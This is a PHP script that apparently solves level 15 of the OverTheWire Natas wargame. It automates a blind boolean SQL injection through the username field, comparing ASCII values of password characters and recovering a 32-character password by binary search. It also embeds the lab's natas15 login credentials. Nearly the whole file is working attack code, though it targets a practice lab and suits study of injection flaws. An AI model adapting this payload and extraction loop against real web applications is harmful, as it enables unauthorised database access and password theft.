  1. <?php
  3. /**
  4. * Gets the response from the server when POSTed with $post_data
  5. *
  6. * @param array $post_data Array containing the POST parameters
  7. * @throws Exception When curl fails
  8. * @return string Response from server
  9. */
  10. function get_server_response(array $post_data) {
  11. $ch = curl_init();
  12.  
  13. $post_data_string = http_build_query($post_data);
  14.  
  15. curl_setopt($ch, CURLOPT_URL, "http://natas15.natas.labs.overthewire.org");
  16. //curl_setopt($ch, CURLOPT_URL, "http://localhost/PHPStorm_Workshop/natas/natas15_test.php"); // Debug
  17. curl_setopt($ch, CURLOPT_USERPWD, "natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J");
  18. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  19. curl_setopt($ch, CURLOPT_POST, true);
  20. curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data_string);
  21.  
  22. $response = curl_exec($ch);
  23.  
  24. if($response === false) {
  25. throw new Exception("curl failed.");
  26. }
  27.  
  28. return $response;
  29. }
  32. /**
  33. * <p>
  34. * Generates payload that tests whether ``$test_char`` is GREATER THAN the character at ``$search_index``.<br>
  35. * Comparison is done using ASCII values of the characters.
  36. * </p>
  37. *
  38. * <p>Runs the following exploit query:</p>
  39. * ```
  40. * $remote_query ="SELECT * FROM users WHERE username=\"natas16\" AND ASCII(SUBSTR(users.password, {$search_index}, 1)) > ASCII(\"{$test_char}\") -- Comment for the rest of the $remote_query"
  41. * ```
  42. *
  43. *
  44. * @param string $test_char Test character
  45. * @param int $search_index Index of Test character
  46. * @return array Associative array payload
  47. */
  48. function generate_exploit_payload(string $test_char, int $search_index) {
  49. $search_index++; // Increment search index by 1 because in MySQL we start counting from 1 instead of 0.
  50. $exploit_code = "ASCII(\"{$test_char}\") > ASCII(SUBSTR(users.password, {$search_index}, 1))";
  51.  
  52. $post_data = array(
  53. "username" => "natas16\" AND $exploit_code -- Comment"
  54. );
  55.  
  56. return $post_data;
  57. }
  60. /**
  61. * Tests whether ``$char`` is GREATER THAN the password's char at ``$index``.
  62. * Comparison is done based on ASCII values.
  63. *
  64. * @param string $char Character to test
  65. * @param int $index Index of character
  66. * @return bool
  67. */
  68. function execute_exploit(string $char, int $index) {
  69. $payload = generate_exploit_payload($char, $index);
  70. $response = "";
  71.  
  72. try {
  73. $response = get_server_response($payload);
  74. } catch (Exception $e) { // TODO Add better exception handling
  75. echo "ERROR: " . $e->getMessage();
  76. }
  77.  
  78. return (strpos($response, "This user exists.") !== false);
  79. }
  83. $possible_letters = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
  84. $password = "";
  85.  
  86. for($password_index = 0; $password_index < 32; $password_index++) {
  87. $min_index = 0;
  88. $max_index = strlen($possible_letters) - 1;
  89.  
  90. while ($max_index > $min_index) {
  91. $test_index = intdiv($max_index + $min_index, 2);
  92. $test_char = $possible_letters[$test_index];
  93.  
  94. $test_char_greater_than = execute_exploit($test_char, $password_index);
  95.  
  96. if($max_index - $min_index === 1) {
  97. if($test_char_greater_than) {
  98. $test_char = $possible_letters[$max_index];
  99. } else {
  100. $test_char = $possible_letters[$min_index];
  101. }
  102. break;
  103. } else {
  104. if ($test_char_greater_than) {
  105. $max_index = $test_index;
  106. } else {
  107. $min_index = $test_index;
  108. }
  109. }
  110.  
  111. }
  112.  
  113. $password .= $test_char;
  114. }
  116. echo $password;